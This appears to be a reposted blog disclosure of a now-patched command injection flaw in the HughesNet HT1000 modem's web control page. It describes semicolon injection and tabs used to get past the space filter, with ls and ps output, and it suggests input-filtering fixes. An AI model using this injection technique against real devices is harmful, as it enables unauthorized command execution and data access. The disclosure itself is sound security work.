Disclaimer: This issue has recently (September-ish) been fixed by HughesNet (thank you!) in a firmware update to the HT1000 modem. I am reposting the old article for historical purposes.
The HT1000 modem has a configuration/status webpage called the “System Control Center” (SCC) at the IP address 192.168.0.1. Certain malformed URL within the SCC will cause an arbitrary command to be executed on the modem as an unprivileged user.
This security hole is related to the command to enable and disable Web Acceleration.
To disable WAC, the following URL is called:
To enable WAC, this URL is called:
However, it appears that arbitrary commands can be executed through this URL. Inserting a semicolon and then an arbitrary command results in that command being executed, with the output being piped back to the web browser. For example, visiting the following URL results in some unexpected output:
Command cannot be executed. URI: /wac_userdisable query: command.cgi index.cgi install.cgi pktdump.cgi reg.cgi statscmd.cgi testcmd.cgi witcmd.cgi
This is the output of the Linux command ls. pktdump.cgi is of particular interest…
Although spaces are filtered out by the web server (throwing a 501 Not Implemented page), tabs are not. As such, longer commands can be crafted.
Command cannot be executed. URI: /wac_userdisable query: PID USER VSZ STAT COMMAND 1 root 1812 S init 2 root 0 SW< [kthreadd] 3 root 0 SW< [ksoftirqd/0] 4 root 0 SW< [events/0] 5 root 0 SW< [khelper] 6 root 0 SW< [kblockd/0] 7 root 0 SW< [kseriod] 8 root 0 SW [pdflush] 9 root 0 SW [pdflush] 10 root 0 SW< [kswapd0] 11 root 0 SW< [aio/0] 12 root 0 SW< [nfsiod] 21 root 0 SW< [mtdblockd] 22 root 0 SW< [rpciod/0] 29 root 2260 S klogd -c 4 55 root 3016 S /bin/sh /etc/restartMon.sh 68 root 0 SW< [loop0] 80 root 0 SWN [jffs2_gcd_mtd4] 148 root 0 SW [dlpktproc_Data] 149 root 0 SW [dlpktproc_Monit] 155 root 0 SW [kpep] 319 root 30728 S /fl0/apps/logrt 321 root 11280 S ./sysmon 324 root 3080 S /sbin/getty console 325 root 1984 S /sbin/syslogd 329 root 19392 S cfm 0 331 root 11608 S tfw 1 334 root 17136 S cac 2 335 root 31856 S amu 3 336 root 11436 S ledif 4 337 root 29448 S tmu 5 338 root 41128 S downlink 6 343 root 49556 S uplink 7 344 root 18684 S sdlmgr 8 351 root 28396 S assoc 9 364 root 63292 S diagmgr 10 365 root 27100 S sysinfo 11 367 root 28388 S sbc 12 368 root 20008 S evtmgr 13 370 root 17220 S ddnsc 14 371 root 17276 S vptMgr 15 373 root 11544 S dnsWrapper 16 375 root 11148 S odumonitor 18 441 daemon 5136 S HttpServer -d -4 -c /etc/httpd.conf 448 root 36012 S web15 453 root 3608 S Ntpd -g -c /etc/ntp.conf -p /var/run/ntpd.pid 520 root 4692 S /usr/sbin/sshd -h /fl0/ssh/ssh_host_key -h /fl0/ssh/ssh_host_rsa_key -h /fl0/ssh/ssh_host_dsa_key 537 root 10888 S Dhcpv4Server -4 -cf /etc/dhcpd_v4.conf -lf /var/dhcp/dhcpd_v4.leases -pf /var/run/dhcpd_v4.pid eth0 539 root 33524 S Dhcpv6Server -6 -cf /etc/dhcpd_v6.conf -lf /var/dhcp/dhcpd_v6.leases -pf /var/run/dhcpd_v6.pid eth0 541 root 21908 S snmpd -f -p /var/run/snmpd.pid -c /etc/snmpd.conf 543 root 1960 S radvd 546 nobody 12096 S dnsmasq -x /var/run/dnsmasq.pid -q -Q 8054 -p 10054 4137 root 2884 S sleep 5 4138 daemon 5272 S HttpServer -d -4 -c /etc/httpd.conf 4139 root 30068 S command.cgi 4140 daemon 3016 S sh -c wget -O - -q http://localhost:8088/wac_userdisable?;ps -w 4143 daemon 3192 R ps -w
The sh command line visible above suggests that at least a portion of the URL is being piped directly to sh!
Unfortunately, the filesystem permissions on the modem are not very robust. /etc/passwd is not protected at all and can be accessed in this same way. Furthermore, netcat is available on the modem, which makes it very trivial to set up an unprivileged shell, but that is far beyond the scope of this post.
I hope this is enough information for HughesNet to pinpoint the URL handling bug and squash it flat.
To HughesNet employees, here are my suggestions for fixing it:
I see two quick ‘n dirty options.
1) Mod the webserver (nhttpd?) to filter out tabs as well as spaces in URLs, and/or make it scream if it sees a semicolon or other special shell characters.
2) Mod the .cgi app that calls the little app hanging around at localhost:8088 to similarly scream at special bash characters like semicolons.
For best security, do both. If you do #2 but not #1, another engineer may write a similar piece of code and introduce a new vulnerability.
Note: Hughes Net pushed out software version 18.104.22.168, which closed this hole on the HT1000. The HT1100 modem, which sports a newer firmware reversion when shipped, never had this vulnerability. It appears the hole was closed by modifying the onboard webserver to prevent nasty input from even reaching the underlying bash script.